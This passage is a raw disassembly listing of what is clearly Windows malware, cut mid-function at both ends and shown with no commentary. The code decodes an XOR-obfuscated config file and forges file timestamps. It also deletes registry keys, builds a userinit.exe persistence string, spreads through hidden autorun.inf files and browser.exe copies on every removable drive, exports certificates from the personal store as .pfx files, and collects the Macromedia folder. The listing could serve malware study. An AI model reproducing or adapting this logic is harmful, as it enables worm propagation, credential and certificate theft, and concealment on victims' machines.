lea edi, [ebp+var_31B]
rep stosd
stosw
mov [ebp+FileName], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_213]
rep stosd
stosw
mov [ebp+Dest], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_113]
rep stosd
stosw
mov [ebp+Buffer], 0
mov [ebp+NumberOfBytesWritten], 0
push 0FFh ; uSize
lea eax, [ebp+String1]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
lea ecx, [ebp+String1]
push ecx
push offset aSKernel32_dll ; "%s\\kernel32.dll"
lea edx, [ebp+FileName]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_1000B605
push 0 ; lpLastWriteTime
push 0 ; lpLastAccessTime
lea ecx, [ebp+CreationTime]
push ecx ; lpCreationTime
mov edx, [ebp+hObject]
push edx ; hFile
call ds:GetFileTime ; GetFileTime
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000B605: ; CODE XREF: sub_1000B536+B1�j
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_10022080
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea ecx, [ebp+String1]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_1000B676
push 0 ; lpOverlapped
lea edx, [ebp+NumberOfBytesWritten]
push edx ; lpNumberOfBytesRead
push 1 ; nNumberOfBytesToRead
lea eax, [ebp+Buffer]
push eax ; lpBuffer
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:ReadFile ; ReadFile
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000B676: ; CODE XREF: sub_1000B536+11B�j
push 0FFh ; uSize
lea eax, [ebp+String1]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_1002207C
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea ecx, [ebp+String1]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_1000B6FC
push 0 ; lpOverlapped
lea edx, [ebp+NumberOfBytesWritten]
push edx ; lpNumberOfBytesRead
push 0FFh ; nNumberOfBytesToRead
lea eax, [ebp+Dest]
push eax ; lpBuffer
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:ReadFile ; ReadFile
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000B6FC: ; CODE XREF: sub_1000B536+19E�j
lea eax, [ebp+Dest]
push eax ; lpString
call ds:lstrlenA ; lstrlenA
test eax, eax
jnz loc_1000B7C3
push 0 ; Time
call ds:time ; time
add esp, 4
mov [ebp+var_10], eax
lea ecx, [ebp+PerformanceCount]
push ecx ; lpPerformanceCount
call ds:QueryPerformanceCounter ; QueryPerformanceCounter
mov edx, dword ptr [ebp+PerformanceCount]
push edx
mov eax, dword ptr [ebp+PerformanceCount+4]
push eax
mov ecx, [ebp+var_10]
push ecx
push offset aXXX ; "%x-%x-%x"
lea edx, [ebp+Dest]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 14h
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea eax, [ebp+String1]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_1000B7BF
push 0 ; lpOverlapped
lea ecx, [ebp+NumberOfBytesWritten]
push ecx ; lpNumberOfBytesWritten
lea edx, [ebp+Dest]
push edx ; lpString
call ds:lstrlenA ; lstrlenA
push eax ; nNumberOfBytesToWrite
lea eax, [ebp+Dest]
push eax ; lpBuffer
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:WriteFile ; WriteFile
lea edx, [ebp+CreationTime]
push edx ; lpLastWriteTime
lea eax, [ebp+CreationTime]
push eax ; lpLastAccessTime
lea ecx, [ebp+CreationTime]
push ecx ; lpCreationTime
mov edx, [ebp+hObject]
push edx ; hFile
call ds:SetFileTime ; SetFileTime
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
jmp short loc_1000B7C3
; ---------------------------------------------------------------------------
loc_1000B7BF: ; CODE XREF: sub_1000B536+240�j
xor eax, eax
jmp short loc_1000B7EA
; ---------------------------------------------------------------------------
loc_1000B7C3: ; CODE XREF: sub_1000B536+1D5�j
; sub_1000B536+287�j
lea ecx, [ebp+Dest]
push ecx
movsx edx, [ebp+Buffer]
push edx
push offset aD_S ; "%d_%s"
push offset byte_10065ED8 ; Dest
call ds:sprintf ; sprintf
add esp, 10h
mov eax, 1
loc_1000B7EA: ; CODE XREF: sub_1000B536+28B�j
pop edi
mov esp, ebp
pop ebp
retn
sub_1000B536 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_1000B7EF(LPVOID)
sub_1000B7EF proc near ; DATA XREF: sub_1000C9DC+1AB�o
var_4EE4 = dword ptr -4EE4h
Buffer = byte ptr -4EE0h
var_4DE0 = dword ptr -4DE0h
RootPathName = byte ptr -4DDCh
var_4DDB = byte ptr -4DDBh
NumberOfBytesWritten= dword ptr -4D9Ch
var_4D98 = byte ptr -4D98h
String1 = byte ptr -4D94h
var_4C94 = dword ptr -4C94h
var_4C90 = dword ptr -4C90h
Source = dword ptr -4C8Ch
var_4C88 = dword ptr -4C88h
var_4C84 = dword ptr -4C84h
phkResult = dword ptr -4C80h
var_4C7C = byte ptr -4C7Ch
var_4C7B = byte ptr -4C7Bh
var_4B7C = byte ptr -4B7Ch
var_4B7B = byte ptr -4B7Bh
var_4A7C = byte ptr -4A7Ch
var_4A7B = byte ptr -4A7Bh
dwIndex = dword ptr -497Ch
var_4978 = byte ptr -4978h
var_4977 = byte ptr -4977h
SubKey = byte ptr -4878h
var_4478 = dword ptr -4478h
var_4474 = byte ptr -4474h
var_4473 = byte ptr -4473h
cbData = dword ptr -436Ch
Dst = byte ptr -4368h
var_4367 = byte ptr -4367h
var_4348 = dword ptr -4348h
Filename = byte ptr -4344h
var_4343 = byte ptr -4343h
Type = dword ptr -423Ch
hObject = dword ptr -4238h
FileName = byte ptr -4234h
var_4134 = dword ptr -4134h
String2 = byte ptr -4130h
var_412F = byte ptr -412Fh
cchName = dword ptr -4030h
Memory = dword ptr -402Ch
var_4028 = byte ptr -4028h
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
Dest = dword ptr -0Ch
hFile = dword ptr -8
hModule = dword ptr -4
push ebp
mov ebp, esp
mov eax, 4EE4h
call __alloca_probe
push esi
push edi
mov [ebp+cbData], 0FFh
mov [ebp+Type], 1
mov [ebp+var_4134], 0
mov [ebp+Dest], 0
mov [ebp+var_4C7C], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_4C7B]
rep stosd
stosw
mov [ebp+var_4B7C], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_4B7B]
rep stosd
stosw
mov [ebp+Dst], 0
mov ecx, 7
xor eax, eax
lea edi, [ebp+var_4367]
rep stosd
stosw
stosb
mov [ebp+var_4978], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_4977]
rep stosd
stosw
mov [ebp+var_4A7C], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_4A7B]
rep stosd
stosw
mov [ebp+String2], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_412F]
rep stosd
stosw
push offset aShell32_0 ; "shell32"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+hModule], eax
push offset aShgetspecialfo ; "SHGetSpecialFolderPathA"
mov eax, [ebp+hModule]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_1006A8F4, eax
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_1002205C
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
call sub_1000878F
add esp, 4
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022060
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
call sub_100015CE
add esp, 4
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_100220CC
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
push offset byte_1006A924 ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset byte_1006A924 ; lpString2
call sub_10005BE3
add esp, 4
test eax, eax
jnz short loc_1000B97B
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_100220D0
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
push offset byte_1006A924 ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_1000B97B: ; CODE XREF: sub_1000B7EF+163�j
call sub_1000B536
test eax, eax
jnz short loc_1000B98B
xor eax, eax
jmp loc_1000C9D4
; ---------------------------------------------------------------------------
loc_1000B98B: ; CODE XREF: sub_1000B7EF+193�j
push 0FFh ; uSize
lea eax, [ebp+FileName]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset aL00834_dat ; "\\l00834.dat"
lea ecx, [ebp+FileName]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea edx, [ebp+FileName]
push edx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz loc_1000BAC1
push 0 ; lpFileSizeHigh
mov eax, [ebp+hObject]
push eax ; hFile
call ds:GetFileSize ; GetFileSize
mov [ebp+var_4C88], eax
mov ecx, [ebp+var_4C88]
add ecx, 1
push ecx ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Source], eax
mov edx, [ebp+var_4C88]
add edx, 1
push edx ; Size
push 0 ; Val
mov eax, [ebp+Source]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0 ; lpOverlapped
lea ecx, [ebp+cbData]
push ecx ; lpNumberOfBytesRead
mov edx, [ebp+var_4C88]
sub edx, 1
push edx ; nNumberOfBytesToRead
mov eax, [ebp+Source]
push eax ; lpBuffer
mov ecx, [ebp+hObject]
push ecx ; hFile
call ds:ReadFile ; ReadFile
mov [ebp+var_4C90], 0
jmp short loc_1000BA69
; ---------------------------------------------------------------------------
loc_1000BA5A: ; CODE XREF: sub_1000B7EF+2AA�j
mov edx, [ebp+var_4C90]
add edx, 1
mov [ebp+var_4C90], edx
loc_1000BA69: ; CODE XREF: sub_1000B7EF+269�j
mov eax, [ebp+var_4C88]
sub eax, 1
cmp [ebp+var_4C90], eax
jnb short loc_1000BA9B
mov ecx, [ebp+Source]
add ecx, [ebp+var_4C90]
mov dl, [ecx]
xor dl, 3Bh
mov eax, [ebp+Source]
add eax, [ebp+var_4C90]
mov [eax], dl
jmp short loc_1000BA5A
; ---------------------------------------------------------------------------
loc_1000BA9B: ; CODE XREF: sub_1000B7EF+289�j
push offset asc_100231C0 ; "\n"
push offset dword_10037024 ; int
mov ecx, [ebp+Source]
push ecx ; Source
call sub_100011DC
add esp, 0Ch
mov edx, [ebp+hObject]
push edx ; hObject
call ds:CloseHandle ; CloseHandle
loc_1000BAC1: ; CODE XREF: sub_1000B7EF+1E9�j
lea eax, [ebp+phkResult]
push eax ; phkResult
push 0F003Fh ; samDesired
push 0 ; ulOptions
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_10022044
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpSubKey
push 80000002h ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz loc_1000BC4F
cmp dword_10030228, 0
jz loc_1000BC4F
push offset aClose ; "close"
mov eax, dword_10030228
mov ecx, [eax+4]
push ecx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz loc_1000BBAD
mov [ebp+cbData], 200h
push 20h ; Size
push 0 ; Val
lea edx, [ebp+Dst]
push edx ; Dst
call memset ; memset
add esp, 0Ch
lea eax, [ebp+cbData]
push eax ; lpcbData
lea ecx, [ebp+Dst]
push ecx ; lpData
lea edx, [ebp+Type]
push edx ; lpType
push 0 ; lpReserved
push offset aSl ; "sl"
mov eax, [ebp+phkResult]
push eax ; hKey
call ds:RegQueryValueExA ; RegQueryValueExA
push 0 ; Time
call ds:time ; time
add esp, 4
mov esi, eax
lea ecx, [ebp+Dst]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
sub esi, eax
mov edx, dword_10030228
mov eax, [edx+4]
push eax ; Str
call ds:atoi ; atoi
add esp, 4
cmp esi, eax
jge short loc_1000BBAD
mov dword_100220E4, 0
loc_1000BBAD: ; CODE XREF: sub_1000B7EF+332�j
; sub_1000B7EF+3B2�j
push offset aClose_0 ; "close"
mov ecx, dword_1002C20C
mov edx, [ecx+4]
push edx ; lpString1
call ds:lstrcmpA ; lstrcmpA
test eax, eax
jz loc_1000BC4F
mov [ebp+cbData], 200h
push 20h ; Size
push 0 ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset ; memset
add esp, 0Ch
lea ecx, [ebp+cbData]
push ecx ; lpcbData
lea edx, [ebp+Dst]
push edx ; lpData
lea eax, [ebp+Type]
push eax ; lpType
push 0 ; lpReserved
push offset aGl_0 ; "gl"
mov ecx, [ebp+phkResult]
push ecx ; hKey
call ds:RegQueryValueExA ; RegQueryValueExA
push 0 ; Time
call ds:time ; time
add esp, 4
mov esi, eax
lea edx, [ebp+Dst]
push edx ; Str
call ds:atoi ; atoi
add esp, 4
sub esi, eax
mov eax, dword_1002C20C
mov ecx, [eax+4]
push ecx ; Str
call ds:atoi ; atoi
add esp, 4
cmp esi, eax
jge short loc_1000BC4F
mov dword_100220E8, 0
loc_1000BC4F: ; CODE XREF: sub_1000B7EF+309�j
; sub_1000B7EF+316�j ...
mov [ebp+dwIndex], 0
mov [ebp+cchName], 400h
lea edx, [ebp+phkResult]
push edx ; phkResult
push 0F003Fh ; samDesired
push 0 ; ulOptions
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022034
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpSubKey
push 80000002h ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz short loc_1000BCE5
loc_1000BC9B: ; CODE XREF: sub_1000B7EF+4F4�j
push 0 ; lpftLastWriteTime
push 0 ; lpcchClass
push 0 ; lpClass
push 0 ; lpReserved
lea edx, [ebp+cchName]
push edx ; lpcchName
lea eax, [ebp+SubKey]
push eax ; lpName
mov ecx, [ebp+dwIndex]
push ecx ; dwIndex
mov edx, [ebp+phkResult]
push edx ; hKey
call ds:RegEnumKeyExA ; RegEnumKeyExA
test eax, eax
jnz short loc_1000BCE5
lea eax, [ebp+SubKey]
push eax ; lpSubKey
mov ecx, [ebp+phkResult]
push ecx ; hKey
call ds:RegDeleteKeyA ; RegDeleteKeyA
mov [ebp+var_4C94], eax
jmp short loc_1000BC9B
; ---------------------------------------------------------------------------
loc_1000BCE5: ; CODE XREF: sub_1000B7EF+4AA�j
; sub_1000B7EF+4D8�j
lea edx, [ebp+phkResult]
push edx ; phkResult
push 0F003Fh ; samDesired
push 0 ; ulOptions
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022048
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpSubKey
push 80000002h ; hKey
call ds:RegOpenKeyExA ; RegOpenKeyExA
test eax, eax
jnz short loc_1000BD39
lea edx, [ebp+var_4978]
push edx
push offset aSuserinit_exe ; "%suserinit.exe,"
lea eax, [ebp+SubKey]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
loc_1000BD39: ; CODE XREF: sub_1000B7EF+52C�j
mov [ebp+var_4474], 0
mov ecx, 41h
xor eax, eax
lea edi, [ebp+var_4473]
rep stosd
mov [ebp+Memory], 0
mov ecx, 0FFFh
xor eax, eax
lea edi, [ebp+var_4028]
rep stosd
mov [ebp+Filename], 0
mov ecx, 41h
xor eax, eax
lea edi, [ebp+var_4343]
rep stosd
mov [ebp+var_2C], 0
mov ecx, 7
xor eax, eax
lea edi, [ebp+var_2B]
rep stosd
stosw
stosb
mov [ebp+var_4348], 0
push offset aCopyfilea ; "CopyFileA"
push offset aKernel32 ; "kernel32"
call ds:LoadLibraryA ; LoadLibraryA
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_1006A8FC, eax
call ds:GetLogicalDrives ; GetLogicalDrives
mov [ebp+var_4C84], eax
mov [ebp+var_4478], 2
jmp short loc_1000BDDE
; ---------------------------------------------------------------------------
loc_1000BDCF: ; CODE XREF: sub_1000B7EF:loc_1000BF6B�j
mov ecx, [ebp+var_4478]
add ecx, 1
mov [ebp+var_4478], ecx
loc_1000BDDE: ; CODE XREF: sub_1000B7EF+5DE�j
cmp [ebp+var_4478], 20h
jge loc_1000BF70
mov edx, 1
mov ecx, [ebp+var_4478]
shl edx, cl
mov eax, [ebp+var_4C84]
and eax, edx
test eax, eax
jz loc_1000BF6B
mov [ebp+RootPathName], 0
mov ecx, 0Fh
xor eax, eax
lea edi, [ebp+var_4DDB]
rep stosd
stosw
stosb
mov ecx, [ebp+var_4478]
add ecx, 61h
mov [ebp+var_4D98], cl
movsx edx, [ebp+var_4D98]
push edx
push offset aC_1 ; "%c:\\"
lea eax, [ebp+RootPathName]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
lea ecx, [ebp+RootPathName]
push ecx ; lpRootPathName
call ds:GetDriveTypeA ; GetDriveTypeA
mov [ebp+var_4DE0], eax
cmp [ebp+var_4DE0], 2
jnz loc_1000BF6B
lea edx, [ebp+RootPathName]
push edx
push offset aSautorun_inf ; "%sautorun.inf"
lea eax, [ebp+Buffer]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea ecx, [ebp+Buffer]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hFile], eax
cmp [ebp+hFile], 0FFFFFFFFh
jz loc_1000BF6B
push 0 ; lpOverlapped
lea edx, [ebp+NumberOfBytesWritten]
push edx ; lpNumberOfBytesWritten
push 1Dh ; nNumberOfBytesToWrite
push offset aAutorunOpenBro ; "[autorun]\r\nopen=browser.exe\r\n"
mov eax, [ebp+hFile]
push eax ; hFile
call ds:WriteFile ; WriteFile
mov ecx, [ebp+hFile]
push ecx ; hObject
call ds:CloseHandle ; CloseHandle
push 7 ; dwFileAttributes
lea edx, [ebp+Buffer]
push edx ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
push 0FFh ; uSize
lea eax, [ebp+Buffer]
push eax ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
lea ecx, [ebp+RootPathName]
push ecx ; lpString2
lea edx, [ebp+String1]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset aBrowser_exe ; "browser.exe"
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_100220C0
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea eax, [ebp+Buffer]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
push 0
lea ecx, [ebp+String1]
push ecx
lea edx, [ebp+Buffer]
push edx
call dword_1006A8FC ; CopyFileA
push 7 ; dwFileAttributes
lea eax, [ebp+String1]
push eax ; lpFileName
call ds:SetFileAttributesA ; SetFileAttributesA
loc_1000BF6B: ; CODE XREF: sub_1000B7EF+613�j
; sub_1000B7EF+678�j ...
jmp loc_1000BDCF
; ---------------------------------------------------------------------------
loc_1000BF70: ; CODE XREF: sub_1000B7EF+5F6�j
push 0FFh ; uSize
lea ecx, [ebp+FileName]
push ecx ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset aMmd109en_dat ; "\\mmd109en.dat"
lea edx, [ebp+FileName]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea eax, [ebp+FileName]
push eax ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jnz loc_1000C674
mov [ebp+var_4134], 0
loc_1000BFCD: ; CODE XREF: sub_1000B7EF+8CC�j
mov ecx, [ebp+var_4134]
cmp dword_1005FED8[ecx*4], 0
jz loc_1000C0C0
cmp [ebp+var_4134], 1000h
jnb loc_1000C0C0
push 4008h ; Size
call ds:malloc ; malloc
add esp, 4
mov lpParameter, eax
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov dword_10057ED8, eax
push 0FFh ; Size
push 0 ; Val
mov edx, dword_10057ED8
push edx ; Dst
call memset ; memset
add esp, 0Ch
push 1000h ; Size
push offset dword_10057ED8 ; Src
mov eax, lpParameter
push eax ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov ecx, lpParameter
mov dword ptr [ecx+4004h], 3
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, lpParameter
mov [edx+4000h], eax
mov eax, [ebp+var_4134]
mov ecx, dword_1005FED8[eax*4]
push ecx ; Source
mov edx, lpParameter
mov eax, [edx+4000h]
push eax ; Dest
call strcpy ; strcpy
add esp, 8
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov ecx, lpParameter
push ecx ; lpParameter
push offset sub_1000B027 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov edx, [ebp+var_4134]
add edx, 1
mov [ebp+var_4134], edx
jmp loc_1000BFCD
; ---------------------------------------------------------------------------
loc_1000C0C0: ; CODE XREF: sub_1000B7EF+7EC�j
; sub_1000B7EF+7FC�j
push 8000h ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+Dest], eax
push 8000h ; Size
push 0 ; Val
mov eax, [ebp+Dest]
push eax ; Dst
call memset ; memset
add esp, 0Ch
mov ecx, [ebp+Dest]
push ecx ; Dest
call sub_100020B5
add esp, 4
mov [ebp+Dest], eax
mov [ebp+var_4134], 0
loc_1000C0FD: ; CODE XREF: sub_1000B7EF+939�j
mov edx, [ebp+var_4134]
cmp dword_1004B770[edx*4], 0
jz short loc_1000C12A
cmp [ebp+var_4134], 1000h
jnb short loc_1000C12A
mov eax, [ebp+var_4134]
add eax, 1
mov [ebp+var_4134], eax
jmp short loc_1000C0FD
; ---------------------------------------------------------------------------
loc_1000C12A: ; CODE XREF: sub_1000B7EF+91C�j
; sub_1000B7EF+928�j
push 310h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, [ebp+var_4134]
mov dword_1004B770[ecx*4], eax
push offset dword_10034264 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022050
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_15 ; "%s%s"
lea ecx, [ebp+String2]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
lea edx, [ebp+String2]
push edx ; lpString2
mov eax, [ebp+var_4134]
mov ecx, dword_1004B770[eax*4]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
mov edx, [ebp+var_4134]
mov eax, dword_1004B770[edx*4]
mov ecx, [ebp+Dest]
mov [eax+100h], ecx
mov edx, [ebp+Dest]
push edx ; Str
call strlen ; strlen
add esp, 4
mov ecx, [ebp+var_4134]
mov edx, dword_1004B770[ecx*4]
mov [edx+104h], eax
push offset byte_100739AC ; lpString2
mov eax, [ebp+var_4134]
mov ecx, dword_1004B770[eax*4]
add ecx, 108h
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset byte_10065ED8
push offset aS__ps_txt ; "%s__PS.txt"
mov edx, [ebp+var_4134]
mov eax, dword_1004B770[edx*4]
add eax, 207h
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
mov ecx, [ebp+var_4134]
mov edx, dword_1004B770[ecx*4]
mov eax, [ebp+var_4134]
mov [edx+308h], eax
mov ecx, [ebp+var_4134]
mov edx, dword_1004B770[ecx*4]
mov dword ptr [edx+30Ch], 0
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov eax, [ebp+var_4134]
mov ecx, dword_1004B770[eax*4]
push ecx ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov dword_10034234, 0
push 400h ; Size
call ds:malloc ; malloc
add esp, 4
mov edx, dword_10034234
mov lpBuffer[edx*4], eax
push 0FFh ; Size
call ds:malloc ; malloc
add esp, 4
mov dword_10053DD8, eax
push offset a_pfx_0 ; ".pfx"
mov eax, dword_10053DD8
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset dword_100739B0
push offset dword_100739B4
push offset aMy_0 ; "MY"
call sub_1000E66B
add esp, 0Ch
mov ecx, hModule
push ecx ; hLibModule
call ds:FreeLibrary ; FreeLibrary
mov edx, dword_10034234
mov eax, lpBuffer[edx*4]
push eax ; lpBuffer
push 0FFh ; nBufferLength
call ds:GetTempPathA ; GetTempPathA
push 5Ch ; Ch
mov ecx, dword_10034234
mov edx, lpBuffer[ecx*4]
push edx ; Str
call ds:strrchr ; strrchr
add esp, 8
mov byte ptr [eax], 0
push offset dword_10034264 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022050
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_16 ; "%s%s"
lea edx, [ebp+String2]
push edx ; Dest
call ds:sprintf ; sprintf
add esp, 10h
push 0 ; dwMilliseconds
lea eax, [ebp+String2]
push eax ; lpString2
push 1 ; int
push offset dword_10053DD8 ; int
mov ecx, dword_10034234
mov edx, lpBuffer[ecx*4]
push edx ; Str
call sub_10007B34
add esp, 14h
mov eax, dword_10053DD8
push eax ; Memory
call ds:free ; free
add esp, 4
mov dword_10053DD8, 0
push 0 ; Str2
call sub_1000E866
add esp, 4
push offset dword_10034264 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_10022050
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset byte_1006A924
push offset aSS_17 ; "%s%s"
lea eax, [ebp+String2]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 10h
mov dword_100281F0, 0
push 105h ; Size
call ds:malloc ; malloc
add esp, 4
mov ecx, dword_100281F0
mov Dest[ecx*4], eax
push 105h ; Size
push 0 ; Val
mov edx, dword_100281F0
mov eax, Dest[edx*4]
push eax ; Dst
call memset ; memset
add esp, 0Ch
push 0
push 1Ah
lea ecx, [ebp+var_4474]
push ecx
push 0
call dword_1006A8F4 ; SHGetSpecialFolderPathA
lea edx, [ebp+Filename]
push edx ; lpBuffer
push 0FFh ; nBufferLength
call ds:GetTempPathA ; GetTempPathA
push offset aMed23ru17_tmp ; "med23ru17.tmp"
lea eax, [ebp+Filename]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
lea ecx, [ebp+var_4474]
push ecx
push offset aSMacromedia ; "%s\\Macromedia"
mov edx, dword_100281F0
mov eax, Dest[edx*4]
push eax ; Dest
call ds:sprintf ; sprintf
add esp, 0Ch
push 0 ; dwMilliseconds
lea ecx, [ebp+Memory]
push ecx ; int
mov edx, dword_100281F0
mov eax, Dest[edx*4]
push eax ; int
call sub_100071C0
add esp, 0Ch
lea ecx, [ebp+Memory]
push ecx ; int
lea edx, [ebp+Filename]
push edx ; Filename
call sub_1001AE00
add esp, 8
loc_1000C487: ; CODE XREF: sub_1000B7EF+CF3�j
mov eax, [ebp+var_4348]
cmp [ebp+eax*4+Memory], 0
jbe short loc_1000C4E4
mov ecx, [ebp+var_4348]
mov edx, [ebp+ecx*4+Memory]
push edx ; lpFileName
call ds:DeleteFileA ; DeleteFileA
mov eax, [ebp+var_4348]
